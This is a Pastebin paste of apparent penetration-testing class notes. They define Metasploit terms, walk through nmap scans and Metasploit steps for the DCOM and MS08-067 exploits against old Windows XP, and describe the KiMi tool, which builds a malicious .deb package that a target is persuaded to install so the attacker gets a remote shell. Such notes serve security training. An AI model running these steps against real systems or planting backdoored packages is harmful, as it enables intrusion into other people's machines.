Advertisement
Mukezh

Metasploit Framework

Nov 26th, 2018
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.37 KB | None | 0 0
  1. Grade 2 Session 7
  2. ===================
  3.  
  4. Metasploit Framework
  5. ====================
  6. Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. Most of the researchers uses this tool for exploiting devices, machine, databases and servers.
  7. This tool is a product of Rapid7 community.
  8. Metasploit Framework we use is a trial version|limited version.
  9.  
  10.  
  11. MODULE CONTAINING :
  12.  
  13. Payloads
  14. Exploits
  15. Auxiliary
  16. Encoders
  17. NOPS
  18. Post
  19.  
  20.  
  21. Terminologies
  22. =============
  23. 1. Vulnerabilities
  24. 2. Exploit
  25. 3. Payload
  26. 4. Backdoor
  27. 5. Covering Traces
  28.  
  29. Terms
  30. =====
  31. RHOST : Remote Host - Target's IP Address in which we have to attack.
  32. RPORT : Remote Port - The port number of target machine on which a vulnerable service is running
  33. LHOST : Listening Host - Attacker's IP Address on which they are listening to reverse connection
  34. LPORT : Listening Port - The port number on which an attacker is listening the reverse connection.
  35.  
  36.  
  37. CONSOLE BASED EXPLOIT - 1
  38. ==========================
  39. Reuirements :
  40. = XP Service Pack 0 And Service Pack 1
  41. = Kali Linux
  42. = Metasploit Framework
  43.  
  44. KALI : https://www.exploit-db.com/exploits/66/
  45.  
  46. DCOM is an acronym that stands for Distributed Component Object Model is a protocol that enables software components to communicate directly over a network which by default runs in Win XP SP0-SP1 and Win Server 2000.
  47.  
  48. Steps:
  49. ======
  50. 1. nmap -sS -sC -sV <IP Address>
  51. 2. nmap -A -T4 <IP Address>
  52. 3. msfconsole
  53. 4. search the corresponding exploit
  54. search dcom
  55. 5. use <path of the above exploit>
  56. 6. show info - information of the exploit
  57. 7. show options - to show the options of the exploit
  58. 8. set RHOST <target IP Address>
  59. 9. show options
  60. 10. exploit
  61.  
  62.  
  63. CONSOLE BASED EXPLOIT - 2
  64. =========================
  65. Reuirements :
  66. = XP Service Pack 2
  67. = Kali Linux ---> Updates
  68. = Metasploit Framework
  69.  
  70. Netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network. netapi32.dll is a system process that is needed for your PC to work properly and it should not be removed. The version of Netapi.dll in Win Xp SP2 is vulnerable and allows the remote attacker to get the remote access of the machine.
  71.  
  72. LINK : https://www.exploit-db.com/exploits/40279/
  73.  
  74. Steps:
  75. ======
  76. 1. nmap -sS -sC -sV <IP Address>
  77. 2. nmap -A -T4 <IP Address>
  78. 3. msfconsole
  79. 4. search the corresponding exploit
  80. search ms08-067/netapi
  81. 5. use <path of the above exploit>
  82. 6. show info --> information of the exploit
  83. 7. show options --> to show the options of the exploit
  84. 8. set RHOST <target IP Address>
  85. 9. show options
  86. 10. exploit
  87.  
  88.  
  89. KiMi Framework
  90. ==============
  91. It is a framework for exploiting linux based OS. It is named after a character of Naruto - Kimimaro. In this framework, we create a malicious file of extension .deb (debian file extension). We ask the target to install that debian package. as soon as the target install the debian package, we will receive a meterpreter session.
  92. We need to download this framework from github
  93. https://github.com/ChaitanyaHaritash/kimi
  94.  
  95.  
  96. STEPS :
  97. =======
  98. Copy the link
  99. Open the linux teminal and type
  100. #git clone https://github.com/ChaitanyaHaritash/kimi.git
  101. #cd kimi
  102. #python kimi.py -h(help page)
  103.  
  104.  
  105. https://www.offensive-security.com/metasploit-unleashed/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement